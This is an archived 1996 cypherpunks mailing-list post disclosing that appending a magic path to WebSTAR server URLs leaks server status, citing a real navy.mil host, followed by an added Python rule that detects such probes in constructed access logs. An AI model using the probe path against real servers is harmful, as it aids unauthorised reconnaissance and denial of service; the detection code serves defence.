From proff Fri Jul 12 11:42:38 1996
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id LAA03294 for best-of-security; Fri, 12 Jul 1996 11:42:38 +1000
Received: from toad.com (toad.com [140.174.2.1]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id LAA03264 for ; Fri, 12 Jul 1996 11:40:55 +1000
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id OAA14238 for cypherpunks-outgoing; Thu, 11 Jul 1996 14:45:49 -0700 (PDT)
Received: from www.clever.net (root@www.clever.net [207.15.222.251]) by toad.com (8.7.5/8.7.3) with ESMTP id OAA14233 for ; Thu, 11 Jul 1996 14:45:41 -0700 (PDT)
Received: from [204.249.244.13] ([204.249.244.13]) by www.clever.net (8.7.3/8.6.9) with ESMTP id RAA16288 for ; Thu, 11 Jul 1996 17:46:47 -0400 (EDT)
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Date: Thu, 11 Jul 1996 17:44:15 -0300
To: cypherpunks@toad.com
From: Cyberdog
Subject: New Mac Web Server Security Hole Discovered
Sender: proff
Precedence: bulk

Try adding /M_A_C_H_T_T_P_V_E_R_S_I_O_N to any of the URLs at http://www.netcraft.co.uk/Survey/Reports/960701/ALL/WebSTAR.html and each server will leak information like

---
http://europa.nadc.navy.mil//M_A_C_H_T_T_P_V_E_R_S_I_O_N
---

WebSTAR, Copyright ©1995 Chuck Shotton, Portions ©1995 StarNine Technologies, Inc. and its Licensors. All rights reserved. PowerPC (CW) version
totalCon 343, maxCon 30, listening 29, current 1, high 8, busy 0, denied 0, timeout 0, maxMem 1140640, currMem 1117024, minMem 1090208, bytesSent 1218888, port 80, maxTimeout 300, verboseMessages false, disableLogging false, hideWindow false, refuseConnections false, upSince 07/11/96:10:48, version 1.2.5(PowerPC (CW))

--

Anyone can use this for denial of service because this backdoor is so well hidden it won't show up in the logs!

The vendor has not committed to an instant fix, but they have told their users not to discuss this on public lists lest their obscurity become unsecure.

p.s. The copyright part was their lawyer's idea!
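The post notes that requests for the magic path do not appear in WebSTAR's own log, so a site wanting to know whether anyone is probing for the status leak has to look at a log kept by something in front of the server (an upstream proxy, a packet capture turned into access-log lines, and so on). The following detection rule is an added example, not code from the original post or from StarNine; it assumes that such an upstream log exists in NCSA common log format, and the sample lines it scans are constructed here for illustration. Matching the marker as a suffix of any path follows the post's "adding ... to any of the URLs"; treating case variants as hits is an assumption made so that a defensive rule errs toward alerting.

```python
import re
from collections import Counter

# Constructed sample lines in NCSA common log format, as an upstream proxy or a
# capture-to-log tool might record them. Not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jul/1996:10:50:01 -0300] "GET /index.html HTTP/1.0" 200 1532
10.0.0.9 - - [11/Jul/1996:10:50:04 -0300] "GET /M_A_C_H_T_T_P_V_E_R_S_I_O_N HTTP/1.0" 200 611
10.0.0.9 - - [11/Jul/1996:10:50:05 -0300] "GET //M_A_C_H_T_T_P_V_E_R_S_I_O_N HTTP/1.0" 200 611
10.0.0.9 - - [11/Jul/1996:10:50:07 -0300] "GET /docs/m_a_c_h_t_t_p_v_e_r_s_i_o_n/ HTTP/1.0" 200 611
10.0.0.7 - - [11/Jul/1996:10:51:00 -0300] "GET /images/logo.gif HTTP/1.0" 200 8802
"""

# One NCSA common log line: client, identd, user, timestamp, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# The path suffix named in the post.
MAGIC = "/M_A_C_H_T_T_P_V_E_R_S_I_O_N"


def is_version_probe(path):
    """True if the request path ends in the status-leak marker.

    The post appends the marker to an existing URL, so it is checked as a
    suffix rather than as an exact path. Case folding and stripping a
    trailing slash are assumptions chosen to favour alerting over silence.
    """
    return path.upper().rstrip("/").endswith(MAGIC)


def find_probes(log_text):
    """Return (client_ip, timestamp, path, status) for every probe found."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed or non-NCSA lines rather than crash
        if is_version_probe(m["path"]):
            hits.append((m["ip"], m["ts"], m["path"], int(m["status"])))
    return hits


def probes_per_source(log_text):
    """Count probes by client address; a repeat offender is worth a look."""
    return Counter(ip for ip, _ts, _path, _status in find_probes(log_text))


if __name__ == "__main__":
    for ip, ts, path, status in find_probes(SAMPLE_LOG):
        print(f"{ts} {ip} requested {path} -> {status}")
    print(probes_per_source(SAMPLE_LOG))
```

A status of 200 on a matched line means the server answered the probe with its status page, which is the condition the post describes; after a vendor fix one would expect the same rule to keep firing on the request while the status changes to an error.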